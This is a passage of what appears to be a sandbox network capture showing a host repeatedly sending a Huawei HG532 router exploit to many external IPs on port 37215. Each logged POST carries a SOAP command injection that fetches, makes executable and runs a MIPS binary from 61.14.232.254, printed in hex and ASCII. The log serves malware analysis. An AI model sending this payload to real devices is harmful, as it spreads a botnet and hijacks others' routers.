6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  749192.168.2.1358382197.67.70.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415002108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  750192.168.2.1332938157.45.51.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415008068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  751192.168.2.133501441.162.193.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415076017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  752192.168.2.1349320157.180.103.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415107012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  753192.168.2.1333846197.29.245.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415213108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  754192.168.2.1349520157.125.149.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415607929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  755192.168.2.134351241.26.126.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415694952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  756192.168.2.1340036157.18.233.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415712118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  757192.168.2.136011041.206.108.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415766954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  758192.168.2.1359642157.149.180.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415791988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  759192.168.2.1343554157.166.247.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415828943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
